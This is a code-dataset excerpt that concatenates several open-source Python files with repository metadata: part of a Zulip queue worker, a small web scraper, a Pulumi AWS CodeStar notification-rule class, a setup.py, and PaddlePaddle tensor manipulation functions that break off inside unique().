                logging.error("Error: User %s has bot with invalid embedded bot service %s" % (
                    user_profile_id, service.name))
                continue
            bot_handler.handle_message(
                message=message,
                bot_handler=self.get_bot_api_client(user_profile)
            )
@assign_queue('deferred_work')
class DeferredWorker(QueueProcessingWorker):
    """Catch-all queue for work deferred out of the request path,
    dispatched on the event's 'type' field."""
    def consume(self, event: Mapping[str, Any]) -> None:
        if event['type'] == 'mark_stream_messages_as_read':
            user_profile = get_user_profile_by_id(event['user_profile_id'])

            for stream_id in event['stream_ids']:
                # Since the user just unsubscribed, we don't require
                # an active Subscription object (otherwise, private
                # streams would never be accessible)
                (stream, recipient, sub) = access_stream_by_id(user_profile, stream_id,
                                                               require_active=False)
                do_mark_stream_messages_as_read(user_profile, stream)
| 40.619403
| 110
| 0.661446
|
4a01f55ab0dbfdc34ed53ff0076d467845459af1
| 1,421
|
py
|
Python
|
collector/gather.py
|
sweeneyngo/swvgio
|
56a3f8413a253e08703eb11857aadac88f98ff87
|
[
"MIT"
] | null | null | null |
collector/gather.py
|
sweeneyngo/swvgio
|
56a3f8413a253e08703eb11857aadac88f98ff87
|
[
"MIT"
] | 2
|
2021-07-21T14:33:00.000Z
|
2021-07-21T14:34:55.000Z
|
collector/gather.py
|
sweeneyngo/swvgio
|
56a3f8413a253e08703eb11857aadac88f98ff87
|
[
"MIT"
] | null | null | null |
from bs4 import BeautifulSoup, SoupStrainer
import httplib2
class Voca:
    """A single scraped video entry: its link, title, and artist."""

    def __init__(self, link, title, artist):
        self.link, self.title, self.artist = link, title, artist
"""
@return [
[Voca(link, title, artist), ... ],
[Voca(link, title, artist), ... ],
]
@extra {len(return) = 2}
"""
def parseVG():
    """Scrape vgperson's vocal-highlights page into per-table playlists.

    Returns a list of playlists (one per HTML <table> on the page), each
    a list of Voca entries, or (None, None) on fetch/parse failure.

    NOTE(review): the failure paths return a 2-tuple (None, None) while
    the success path returns a single list — a caller unpacking two
    values will break on success (and vice versa). Confirm the intended
    contract and make the return arity consistent.
    """
    # http client
    http = httplib2.Http()
    try:
        status, response = http.request("https://vgperson.com/vocalhighlights.php?m=2021-06")
        # status, response = http.request(getSearchQuery())
    except httplib2.ServerNotFoundError:
        print("Couldn't fetch resource.")
        return None, None

    playlists = []
    # Parse only <table> elements; each table corresponds to one playlist.
    for index, table in enumerate(BeautifulSoup(response, features="html.parser", parse_only=SoupStrainer("table"))):
        playlists.append([])
        videos = table.find_all("td")
        # no entries/uneven entries
        if len(videos) <= 0 or len(videos) % 2 != 0:
            return None, None
        # Cells come in (video, artist) pairs.
        for i in range(0, len(videos), 2):
            entry = videos[i].contents or []
            link = entry[0]["href"] or []
            title = entry[0].contents or []
            artist = videos[i + 1].contents or []
            if not (entry and title and artist and link):
                return None, None
            playlists[index].append(Voca(link, title, artist))
    return playlists
| 23.683333
| 117
| 0.570725
|
4a01f6764f9afca4758d07b862e9e02509dfe70e
| 9,183
|
py
|
Python
|
sdk/python/pulumi_aws/codestarnotifications/notification_rule.py
|
michael-golden/pulumi-aws
|
165e876e166ecab1870e857822247585d78aef64
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/codestarnotifications/notification_rule.py
|
michael-golden/pulumi-aws
|
165e876e166ecab1870e857822247585d78aef64
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/codestarnotifications/notification_rule.py
|
michael-golden/pulumi-aws
|
165e876e166ecab1870e857822247585d78aef64
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class NotificationRule(pulumi.CustomResource):
    """Manages an AWS CodeStar Notifications rule.

    NOTE: this class is generated by the Pulumi Terraform bridge (tfgen);
    see the warning in the file header before editing by hand.
    """
    arn: pulumi.Output[str]
    """
    The codestar notification rule ARN.
    """
    detail_type: pulumi.Output[str]
    """
    The level of detail to include in the notifications for this resource. Possible values are `BASIC` and `FULL`.
    """
    event_type_ids: pulumi.Output[list]
    """
    A list of event types associated with this notification rule.
    For list of allowed events see [here](https://docs.aws.amazon.com/codestar-notifications/latest/userguide/concepts.html#concepts-api).
    """
    name: pulumi.Output[str]
    """
    The name of notification rule.
    """
    resource: pulumi.Output[str]
    """
    The ARN of the resource to associate with the notification rule.
    """
    status: pulumi.Output[str]
    """
    The status of the notification rule. Possible values are `ENABLED` and `DISABLED`, default is `ENABLED`.
    """
    tags: pulumi.Output[dict]
    """
    A map of tags to assign to the resource.
    """
    targets: pulumi.Output[list]
    """
    Configuration blocks containing notification target information. Can be specified multiple times. At least one target must be specified on creation.
      * `address` (`str`) - The ARN of notification rule target. For example, a SNS Topic ARN.
      * `status` (`str`) - The status of the notification rule. Possible values are `ENABLED` and `DISABLED`, default is `ENABLED`.
      * `type` (`str`) - The type of the notification target. Default value is `SNS`.
    """
    def __init__(__self__, resource_name, opts=None, detail_type=None, event_type_ids=None, name=None, resource=None, status=None, tags=None, targets=None, __props__=None, __name__=None, __opts__=None):
        """
        Provides a CodeStar Notifications Rule.
        ## Example Usage
        ```python
        import pulumi
        import pulumi_aws as aws
        code = aws.codecommit.Repository("code", repository_name="example-code-repo")
        notif = aws.sns.Topic("notif")
        notif_access = notif.arn.apply(lambda arn: aws.iam.get_policy_document(statements=[{
            "actions": ["sns:Publish"],
            "principals": [{
                "type": "Service",
                "identifiers": ["codestar-notifications.amazonaws.com"],
            }],
            "resources": [arn],
        }]))
        default = aws.sns.TopicPolicy("default",
            arn=notif.arn,
            policy=notif_access.json)
        commits = aws.codestarnotifications.NotificationRule("commits",
            detail_type="BASIC",
            event_type_ids=["codecommit-repository-comments-on-commits"],
            resource=code.arn,
            targets=[{
                "address": notif.arn,
            }])
        ```
        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] detail_type: The level of detail to include in the notifications for this resource. Possible values are `BASIC` and `FULL`.
        :param pulumi.Input[list] event_type_ids: A list of event types associated with this notification rule.
               For list of allowed events see [here](https://docs.aws.amazon.com/codestar-notifications/latest/userguide/concepts.html#concepts-api).
        :param pulumi.Input[str] name: The name of notification rule.
        :param pulumi.Input[str] resource: The ARN of the resource to associate with the notification rule.
        :param pulumi.Input[str] status: The status of the notification rule. Possible values are `ENABLED` and `DISABLED`, default is `ENABLED`.
        :param pulumi.Input[dict] tags: A map of tags to assign to the resource.
        :param pulumi.Input[list] targets: Configuration blocks containing notification target information. Can be specified multiple times. At least one target must be specified on creation.
        The **targets** object supports the following:
          * `address` (`pulumi.Input[str]`) - The ARN of notification rule target. For example, a SNS Topic ARN.
          * `status` (`pulumi.Input[str]`) - The status of the notification rule. Possible values are `ENABLED` and `DISABLED`, default is `ENABLED`.
          * `type` (`pulumi.Input[str]`) - The type of the notification target. Default value is `SNS`.
        """
        # Legacy shim: __name__/__opts__ predate resource_name/opts and are
        # still accepted (with a deprecation warning) for old callers.
        if __name__ is not None:
            warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
            resource_name = __name__
        if __opts__ is not None:
            warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
            opts = __opts__
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = utilities.get_version()
        # No opts.id means we are creating a new resource, so the input
        # properties are validated and packed into __props__ here.  When
        # opts.id is set (lookup via get()), __props__ is passed in directly.
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = dict()
            if detail_type is None:
                raise TypeError("Missing required property 'detail_type'")
            __props__['detail_type'] = detail_type
            if event_type_ids is None:
                raise TypeError("Missing required property 'event_type_ids'")
            __props__['event_type_ids'] = event_type_ids
            __props__['name'] = name
            if resource is None:
                raise TypeError("Missing required property 'resource'")
            __props__['resource'] = resource
            __props__['status'] = status
            __props__['tags'] = tags
            __props__['targets'] = targets
            # arn is an output-only property; the provider fills it in.
            __props__['arn'] = None
        super(NotificationRule, __self__).__init__(
            'aws:codestarnotifications/notificationRule:NotificationRule',
            resource_name,
            __props__,
            opts)
    @staticmethod
    def get(resource_name, id, opts=None, arn=None, detail_type=None, event_type_ids=None, name=None, resource=None, status=None, tags=None, targets=None):
        """
        Get an existing NotificationRule resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.
        :param str resource_name: The unique name of the resulting resource.
        :param str id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] arn: The codestar notification rule ARN.
        :param pulumi.Input[str] detail_type: The level of detail to include in the notifications for this resource. Possible values are `BASIC` and `FULL`.
        :param pulumi.Input[list] event_type_ids: A list of event types associated with this notification rule.
               For list of allowed events see [here](https://docs.aws.amazon.com/codestar-notifications/latest/userguide/concepts.html#concepts-api).
        :param pulumi.Input[str] name: The name of notification rule.
        :param pulumi.Input[str] resource: The ARN of the resource to associate with the notification rule.
        :param pulumi.Input[str] status: The status of the notification rule. Possible values are `ENABLED` and `DISABLED`, default is `ENABLED`.
        :param pulumi.Input[dict] tags: A map of tags to assign to the resource.
        :param pulumi.Input[list] targets: Configuration blocks containing notification target information. Can be specified multiple times. At least one target must be specified on creation.
        The **targets** object supports the following:
          * `address` (`pulumi.Input[str]`) - The ARN of notification rule target. For example, a SNS Topic ARN.
          * `status` (`pulumi.Input[str]`) - The status of the notification rule. Possible values are `ENABLED` and `DISABLED`, default is `ENABLED`.
          * `type` (`pulumi.Input[str]`) - The type of the notification target. Default value is `SNS`.
        """
        # Setting id in opts routes __init__ down its "existing resource"
        # path, so __props__ here only pre-populates known state.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        __props__ = dict()
        __props__["arn"] = arn
        __props__["detail_type"] = detail_type
        __props__["event_type_ids"] = event_type_ids
        __props__["name"] = name
        __props__["resource"] = resource
        __props__["status"] = status
        __props__["tags"] = tags
        __props__["targets"] = targets
        return NotificationRule(resource_name, opts=opts, __props__=__props__)
    def translate_output_property(self, prop):
        # Map provider camelCase property names to Python snake_case.
        return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
    def translate_input_property(self, prop):
        # Map Python snake_case property names back to provider camelCase.
        return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 51.016667
| 202
| 0.663182
|
4a01f7842476d7c7862fe908d9e333dc4bd726a3
| 2,214
|
py
|
Python
|
setup.py
|
MadisonB14/geometry_analysis
|
69ce485c5c0ecdfd3202aa8a0290bc2fdc43f743
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
MadisonB14/geometry_analysis
|
69ce485c5c0ecdfd3202aa8a0290bc2fdc43f743
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
MadisonB14/geometry_analysis
|
69ce485c5c0ecdfd3202aa8a0290bc2fdc43f743
|
[
"BSD-3-Clause"
] | null | null | null |
"""
geometry_analysis
A python package for the MolSSSI Software Summer School.
"""
import sys
from setuptools import setup, find_packages
import versioneer
short_description = __doc__.split("\n")
# from https://github.com/pytest-dev/pytest-runner#conditional-requirement
needs_pytest = {'pytest', 'test', 'ptr'}.intersection(sys.argv)
pytest_runner = ['pytest-runner'] if needs_pytest else []
try:
with open("README.md", "r") as handle:
long_description = handle.read()
except:
long_description = "\n".join(short_description[2:]),
setup(
# Self-descriptive entries which should always be present
name='geometry_analysis',
author='Madison_Berger',
author_email='madisonberger14@hotmail.com',
description=short_description[0],
long_description=long_description,
long_description_content_type="text/markdown",
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
license='BSD-3-Clause',
# Which Python importable modules should be included when your package is installed
# Handled automatically by setuptools. Use 'exclude' to prevent some specific
# subpackage(s) from being added, if needed
packages=find_packages(),
# Optional include package data to ship with your package
# Customize MANIFEST.in if the general case does not suit your needs
# Comment out this line to prevent the files from being packaged with your software
include_package_data=True,
# Allows `setup.py test` to work correctly with pytest
setup_requires=[] + pytest_runner,
# Additional entries you may want simply uncomment the lines you want and fill in the data
# url='http://www.my_package.com', # Website
# install_requires=[], # Required packages, pulls from pip if needed; do not use for Conda deployment
# platforms=['Linux',
# 'Mac OS-X',
# 'Unix',
# 'Windows'], # Valid platforms your code works on, adjust to your flavor
# python_requires=">=3.5", # Python version restrictions
# Manual control if final package is compressible or not, set False to prevent the .egg from being made
# zip_safe=False,
)
| 36.9
| 118
| 0.703704
|
4a01f7e7fa311e0a5a52aa8c79e3859f7bb2f8da
| 58,406
|
py
|
Python
|
python/paddle/tensor/manipulation.py
|
Qengineering/Paddle
|
6453ff055555e17c23727599663092c8a835ce9d
|
[
"Apache-2.0"
] | null | null | null |
python/paddle/tensor/manipulation.py
|
Qengineering/Paddle
|
6453ff055555e17c23727599663092c8a835ce9d
|
[
"Apache-2.0"
] | null | null | null |
python/paddle/tensor/manipulation.py
|
Qengineering/Paddle
|
6453ff055555e17c23727599663092c8a835ce9d
|
[
"Apache-2.0"
] | 1
|
2021-03-23T00:59:48.000Z
|
2021-03-23T00:59:48.000Z
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
from ..fluid.layers import core
from ..fluid.layer_helper import LayerHelper
from ..fluid.framework import Variable, OpProtoHolder, in_dygraph_mode, convert_np_dtype_to_dtype_, device_guard
from ..fluid.data_feeder import convert_dtype, check_variable_and_dtype, check_type, check_dtype
from ..fluid.layers.tensor import fill_constant
from ..fluid.layers import utils
import numpy as np
import six
# TODO: define functions to manipulate a tensor
from ..fluid.layers import cast #DEFINE_ALIAS
from ..fluid.layers import slice #DEFINE_ALIAS
from ..fluid.layers import transpose #DEFINE_ALIAS
from ..fluid.layers import unstack #DEFINE_ALIAS
from ..fluid.layers import scatter_nd #DEFINE_ALIAS
from ..fluid.layers import shard_index #DEFINE_ALIAS
from ..fluid import layers
import paddle
# Public API of this module; everything else is an implementation detail.
__all__ = [
    'cast',
    'concat',
    'expand',
    'broadcast_to',
    'expand_as',
    'flatten',
    'gather',
    'gather_nd',
    'reshape',
    'reverse',
    'scatter',
    'scatter_nd_add',
    'scatter_nd',
    'shard_index',
    'slice',
    'split',
    'chunk',
    'squeeze',
    'stack',
    'strided_slice',
    'transpose',
    'unique',
    'unsqueeze',
    'unstack',
    'flip',
    'unbind',
    'roll',
    'tile',
]
def concat(x, axis=0, name=None):
    """
    Concatenate the input tensors along ``axis`` into one tensor.

    Args:
        x (list|tuple): Tensors to concatenate. All of them must share one
            data type: bool, float16, float32, float64, int32 or int64.
        axis (int|Tensor, optional): The axis to concatenate along. Either a
            Python int or a Tensor of shape [1] with dtype int32/int64. The
            valid range is [-R, R) for R = Rank(x); a negative value behaves
            like ``axis + R``. Default: 0.
        name (str, optional): Operation name; normally left as None. See
            :ref:`api_guide_Name`.

    Returns:
        Tensor: The concatenation result, same data type as the inputs.

    Examples:
        .. code-block:: python

            import paddle
            x1 = paddle.to_tensor([[1, 2, 3],
                                   [4, 5, 6]])
            x2 = paddle.to_tensor([[11, 12, 13],
                                   [14, 15, 16]])
            out = paddle.concat(x=[x1, x2], axis=0)
            # [[ 1  2  3]
            #  [ 4  5  6]
            #  [11 12 13]
            #  [14 15 16]]
    """
    # Reject anything other than a list/tuple of tensors up front, then
    # delegate the actual work to the fluid implementation.
    check_type(x, 'x', (list, tuple), 'concat')
    return paddle.fluid.layers.concat(input=x, axis=axis, name=name)
def flip(x, axis, name=None):
    """
    :alias_main: paddle.flip
    :alias: paddle.flip,paddle.tensor.flip,paddle.tensor.manipulation.flip

    Reverse an n-D tensor along each of the given axes.

    Args:
        x (Variable): Input tensor of shape [N_1, N_2, ..., N_k]. Supported
            dtypes: float16, float32, float64, int32, int64, bool.
        axis (list|tuple): Axes to flip on; negative indices count from the
            end.
        name (str, optional): Name of the output variable. Normally None;
            see :ref:`api_guide_Name`.

    Returns:
        Variable: Tensor with the same shape and dtype as ``x`` whose
        entries are reversed along the requested axes.

    Examples:
        .. code-block:: python

            import paddle
            import numpy as np
            paddle.disable_static()
            data = np.arange(12).reshape((3, 2, 2)).astype('float32')
            out = paddle.flip(paddle.to_tensor(data), [0, 1])
            # [[[10,11],[8, 9]], [[6, 7],[4, 5]], [[2, 3],[0, 1]]]
    """
    # NOTE: LayerHelper must be created before any extra locals exist,
    # since it captures **locals() as op attributes.
    helper = LayerHelper("flip", **locals())
    check_type(x, 'X', (Variable), 'flip')
    dtype = helper.input_dtype('x')
    check_dtype(dtype, 'X',
                ['float16', 'float32', 'float64', 'int32', 'int64', 'bool'],
                'flip')
    check_type(axis, 'axis', (list, tuple), 'flip')
    # An explicit name requests a named (non-persistable) variable instead
    # of an auto-generated one.
    if name is None:
        result = helper.create_variable_for_type_inference(dtype)
    else:
        result = helper.create_variable(
            name=name, dtype=dtype, persistable=False)
    helper.append_op(
        type="flip",
        inputs={"X": x},
        outputs={"Out": result},
        attrs={"axis": axis})
    return result
def flatten(x, start_axis=0, stop_axis=-1, name=None):
    """
    **Flatten op**

    Flattens a contiguous range of axes in a tensor according to start_axis and stop_axis.

    For Example:

    .. code-block:: text

        Case 1:
          Given
            X.shape = (3, 100, 100, 4)
          and
            start_axis = 1
            end_axis = 2
          We get:
            Out.shape = (3, 100 * 100, 4)

        Case 2:
          Given
            X.shape = (3, 100, 100, 4)
          and
            start_axis = 0
            stop_axis = -1
          We get:
            Out.shape = (3 * 100 * 100 * 4, )

    Args:
        x (Tensor): A tensor of number of dimentions >= axis. A tensor with data type float32,
                    float64, int8, int32, int64.
        start_axis (int): the start axis to flatten
        stop_axis (int): the stop axis to flatten
        name(str, Optional): For details, please refer to :ref:`api_guide_Name`.
                        Generally, no setting is required. Default: None.

    Returns:
        Tensor: A tensor with the contents of the input tensor, with input
                axes flattened by indicated start axis and end axis,
                and data type same as input x.

    Raises:
        ValueError: If x is not a Tensor.
        ValueError: If start_axis or stop_axis is illegal.

    Examples:
        .. code-block:: python

            import paddle
            image_shape=(2, 3, 4, 4)
            x = paddle.arange(end=image_shape[0] * image_shape[1] * image_shape[2] * image_shape[3])
            img = paddle.reshape(x, image_shape)
            out = paddle.flatten(img, start_axis=1, stop_axis=2)
            # out shape is [2, 12, 4]
    """
    if not (isinstance(x, Variable)):
        raise ValueError("The input x should be a Tensor")
    check_variable_and_dtype(
        x, 'x', ['float32', 'float64', 'int8', 'int32', 'int64'], 'flatten')
    helper = LayerHelper('flatten', **locals())
    x_dim = len(x.shape)
    if not (isinstance(start_axis, int)) or (
            start_axis > x_dim - 1) or start_axis < -x_dim:
        raise ValueError(
            "The start_axis should be a int, and in range [-rank(x), rank(x))")
    if not (isinstance(stop_axis, int)) or (
            stop_axis > x_dim - 1) or stop_axis < -x_dim:
        raise ValueError(
            "The stop_axis should be a int, and in range [-rank(x), rank(x))")
    # Normalize negative axes to their positive equivalents before comparing.
    if start_axis < 0:
        start_axis = start_axis + x_dim
    if stop_axis < 0:
        stop_axis = stop_axis + x_dim
    if start_axis > stop_axis:
        # BUG FIX: the message used to read "The stop_axis should be larger
        # than stat_axis" (typo, and >= is actually allowed).
        raise ValueError(
            "The stop_axis should not be smaller than start_axis")
    # Imperative (dygraph) mode bypasses program construction entirely.
    if in_dygraph_mode():
        dy_out, _ = core.ops.flatten_contiguous_range(
            x, 'start_axis', start_axis, 'stop_axis', stop_axis)
        return dy_out
    out = helper.create_variable_for_type_inference(x.dtype)
    # XShape records the input shape so the gradient op can restore it.
    x_shape = helper.create_variable_for_type_inference(x.dtype)
    helper.append_op(
        type='flatten_contiguous_range',
        inputs={"X": x},
        outputs={'Out': out,
                 'XShape': x_shape},
        attrs={"start_axis": start_axis,
               "stop_axis": stop_axis})
    return out
def roll(x, shifts, axis=None, name=None):
    """
    :alias_main: paddle.roll
    :alias: paddle.roll,paddle.tensor.roll,paddle.tensor.manipulation.roll

    Roll the `x` tensor along the given axis(axes). With specific 'shifts', Elements that
    roll beyond the last position are re-introduced at the first according to 'shifts'.
    If a axis is not specified,
    the tensor will be flattened before rolling and then restored to the original shape.

    Args:
        x (Tensor): The x tensor variable as input.
        shifts (int|list|tuple): The number of places by which the elements
                           of the `x` tensor are shifted.
        axis (int|list|tuple|None): axis(axes) along which to roll.

    Returns:
        Tensor: A Tensor with same data type as `x`.

    Examples:
        .. code-block:: python

            import paddle
            x = paddle.to_tensor([[1.0, 2.0, 3.0],
                                  [4.0, 5.0, 6.0],
                                  [7.0, 8.0, 9.0]])
            out_z1 = paddle.roll(x, shifts=1)
            print(out_z1.numpy())
            #[[9. 1. 2.]
            # [3. 4. 5.]
            # [6. 7. 8.]]
            out_z2 = paddle.roll(x, shifts=1, axis=0)
            print(out_z2.numpy())
            #[[7. 8. 9.]
            # [1. 2. 3.]
            # [4. 5. 6.]]
    """
    # NOTE: LayerHelper captures **locals(), so it is created before any
    # helper locals are introduced.
    helper = LayerHelper("roll", **locals())
    origin_shape = x.shape
    # Normalize scalar arguments to lists so the op attrs are uniform.
    if type(shifts) == int:
        shifts = [shifts]
    if type(axis) == int:
        axis = [axis]
    len_origin_shape = len(origin_shape)
    # Validate every requested axis against the tensor rank.
    if axis:
        for i in range(len(axis)):
            if axis[i] >= len_origin_shape or axis[i] < -len_origin_shape:
                raise ValueError(
                    "axis is out of range, it should be in range [{}, {}), but received {}".
                    format(-len_origin_shape, len_origin_shape, axis))
    if axis:
        check_type(axis, 'axis', (list, tuple), 'roll')
    check_type(shifts, 'shifts', (list, tuple), 'roll')
    if in_dygraph_mode():
        # axis=None means: flatten, roll along dim 0, then restore shape.
        if axis is None:
            x = core.ops.reshape(x, 'shape', [-1, 1])
            axis = [0]
        out = core.ops.roll(x, 'axis', axis, 'shifts', shifts)
        return core.ops.reshape(out, 'shape', origin_shape)
    out = helper.create_variable_for_type_inference(x.dtype)
    # Static-graph counterpart of the flatten-roll-restore sequence above.
    if axis is None:
        x = reshape(x, shape=[-1, 1])
        axis = [0]
    helper.append_op(
        type='roll',
        inputs={'X': x},
        outputs={'Out': out},
        attrs={'axis': axis,
               'shifts': shifts})
    out = layers.reshape(out, shape=origin_shape)
    return out
def stack(x, axis=0, name=None):
    """
    :alias_main: paddle.stack
    :alias: paddle.stack, paddle.tensor.stack, paddle.tensor.manipulation.stack

    Stack the tensors in ``x`` along a new ``axis`` dimension.

    All inputs must have the same shape and dtype. Given N tensors of shape
    [A, B]: with ``axis == 0`` the result has shape [N, A, B]; with
    ``axis == 1`` it has shape [A, N, B]; and so on.

    .. code-block:: text

        Input:
            x[0].shape = [1, 2], x[0].data = [[1.0, 2.0]]
            x[1].shape = [1, 2], x[1].data = [[3.0, 4.0]]
            x[2].shape = [1, 2], x[2].data = [[5.0, 6.0]]

        axis = 0 gives:
            Out.shape = [3, 1, 2]
            Out.data  = [[[1.0, 2.0]], [[3.0, 4.0]], [[5.0, 6.0]]]

        axis = 1 (or axis = -2, since -2 + ndim(x[0]) + 1 == 1) gives:
            Out.shape = [1, 3, 2]
            Out.data  = [[[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]]]

    Args:
        x (list[Tensor]|tuple[Tensor]): Tensors to stack; same shape and
            dtype each (float32, float64, int32 or int64).
        axis (int, optional): Axis of the new dimension. Valid range is
            [-(R+1), R+1) for R = ndim(x[0]); negative values behave like
            ``axis + R + 1``. Default: 0.
        name (str, optional): See :ref:`api_guide_Name`. Default: None.

    Returns:
        Tensor: The stacked tensor, same dtype as the inputs.

    Example:
        .. code-block:: python

            import paddle
            paddle.disable_static()
            x1 = paddle.to_tensor([[1.0, 2.0]])
            x2 = paddle.to_tensor([[3.0, 4.0]])
            x3 = paddle.to_tensor([[5.0, 6.0]])
            out = paddle.stack([x1, x2, x3], axis=0)
            print(out.shape)  # [3, 1, 2]
    """
    # Thin wrapper: the fluid layer already implements the full contract.
    return layers.stack(x, axis, name)
def split(x, num_or_sections, axis=0, name=None):
    """
    Split the input tensor into multiple sub-Tensors.

    Args:
        x (Tensor): A N-D Tensor. The data type is bool, float16, float32, float64, int32 or int64.
        num_or_sections (int|list|tuple): If ``num_or_sections`` is an int, then ``num_or_sections``
            indicates the number of equal sized sub-Tensors that the ``x`` will be divided into.
            If ``num_or_sections`` is a list or tuple, the length of it indicates the number of
            sub-Tensors and the elements in it indicate the sizes of sub-Tensors' dimension orderly.
            The length of the list must not be larger than the ``x`` 's size of specified ``axis``.
        axis (int|Tensor, optional): The axis along which to split, it can be a scalar with type
            ``int`` or a ``Tensor`` with shape [1] and data type ``int32`` or ``int64``.
            If :math::`axis < 0`, the axis to split along is :math:`rank(x) + axis`. Default is 0.
        name (str, optional): The default value is None. Normally there is no need for user to set this property.
            For more information, please refer to :ref:`api_guide_Name` .

    Returns:
        list(Tensor): The list of segmented Tensors.

    Example:
        .. code-block:: python

            import numpy as np
            import paddle

            # x is a Tensor which shape is [3, 9, 5]
            x_np = np.random.random([3, 9, 5]).astype("int32")
            x = paddle.to_tensor(x_np)

            out0, out1, out2 = paddle.split(x, num_or_sections=3, axis=1)
            # out0.shape [3, 3, 5]
            # out1.shape [3, 3, 5]
            # out2.shape [3, 3, 5]

            out0, out1, out2 = paddle.split(x, num_or_sections=[2, 3, 4], axis=1)
            # out0.shape [3, 2, 5]
            # out1.shape [3, 3, 5]
            # out2.shape [3, 4, 5]

            out0, out1, out2 = paddle.split(x, num_or_sections=[2, 3, -1], axis=1)
            # out0.shape [3, 2, 5]
            # out1.shape [3, 3, 5]
            # out2.shape [3, 4, 5]

            # axis is negative, the real axis is (rank(x) + axis) which real
            # value is 1.
            out0, out1, out2 = paddle.split(x, num_or_sections=3, axis=-2)
            # out0.shape [3, 3, 5]
            # out1.shape [3, 3, 5]
            # out2.shape [3, 3, 5]
    """
    # DOC FIX: the first example used to unpack into "out0, out1, out22",
    # which contradicted the comments below it.
    # Delegate to the fluid implementation (which names the axis "dim").
    return paddle.fluid.layers.split(
        input=x, num_or_sections=num_or_sections, dim=axis, name=name)
def squeeze(x, axis=None, name=None):
    """
    :alias_main: paddle.squeeze
    :alias: paddle.squeeze, paddle.tensor.squeeze, paddle.tensor.manipulation.squeeze

    Remove size-1 dimensions from the shape of ``x``.

    With ``axis`` given, only the listed dimensions are removed (and only if
    their size is 1; otherwise they are left untouched). Without ``axis``,
    every size-1 dimension is removed.

    .. code-block:: text

        x.shape = [1, 3, 1, 5], axis = None   ->  out.shape = [3, 5]
        x.shape = [1, 3, 1, 5], axis = 0      ->  out.shape = [3, 1, 5]
        x.shape = [1, 3, 1, 5], axis = [0, 2, 3]  ->  out.shape = [3, 5]
        x.shape = [1, 3, 1, 5], axis = [-2]   ->  out.shape = [1, 3, 5]

    Args:
        x (Tensor): Input tensor. Supported dtypes: float32, float64, bool,
            int8, int32, int64.
        axis (int|list|tuple, optional): Dimension(s) to squeeze, each in
            [-ndim(x), ndim(x)); negative values behave like
            ``axis + ndim(x)``. None (the default) removes all size-1 dims.
        name (str, optional): See :ref:`api_guide_Name`. Default: None.

    Returns:
        Tensor: The squeezed tensor, same dtype as ``x``.

    Examples:
        .. code-block:: python

            import paddle
            paddle.disable_static()
            x = paddle.rand([5, 1, 10])
            output = paddle.squeeze(x, axis=1)
            # output.shape [5, 10]
    """
    # Normalize axis to the list form expected by the fluid layer:
    # None -> [], int -> [int], tuple -> list, list passes through.
    if axis is None:
        axes = []
    elif isinstance(axis, int):
        axes = [axis]
    elif isinstance(axis, tuple):
        axes = list(axis)
    else:
        axes = axis
    return layers.squeeze(x, axes, name)
def unique(x,
           return_index=False,
           return_inverse=False,
           return_counts=False,
           axis=None,
           dtype="int64",
           name=None):
    """
    Returns the unique elements of `x` in ascending order.

    Args:
        x(Tensor): The input tensor, it's data type should be float32, float64, int32, int64.
        return_index(bool, optional): If True, also return the indices of the input tensor that
            result in the unique Tensor.
        return_inverse(bool, optional): If True, also return the indices for where elements in
            the original input ended up in the returned unique tensor.
        return_counts(bool, optional): If True, also return the counts for each unique element.
        axis(int, optional): The axis to apply unique. If None, the input will be flattened.
            Default: None.
        dtype(np.dtype|str, optional): The date type of `indices` or `inverse` tensor: int32 or int64.
            Default: int64.
        name(str, optional): Name for the operation. For more information, please refer to
            :ref:`api_guide_Name`. Default: None.

    Returns:
        tuple: (out, indices, inverse, counts). `out` is the unique tensor for `x`. `indices` is
            provided only if `return_index` is True. `inverse` is provided only if `return_inverse`
            is True. `counts` is provided only if `return_counts` is True.

    Examples:
        .. code-block:: python

            import paddle
            x = paddle.to_tensor([2, 3, 3, 1, 5, 3])
            unique = paddle.unique(x)
            np_unique = unique.numpy() # [1 2 3 5]
            _, indices, inverse, counts = paddle.unique(x, return_index=True, return_inverse=True, return_counts=True)
            np_indices = indices.numpy() # [3 0 1 4]
            np_inverse = inverse.numpy() # [1 2 2 0 3 2]
            np_counts = counts.numpy() # [1 1 3 1]
            x = paddle.to_tensor([[2, 1, 3], [3, 0, 1], [2, 1, 3]])
            unique = paddle.unique(x)
            np_unique = unique.numpy() # [0 1 2 3]
            unique = paddle.unique(x, axis=0)
            np_unique = unique.numpy()
            # [[2 1 3]
            #  [3 0 1]]
    """
    # The op expects axis as a list: empty list means "flatten first".
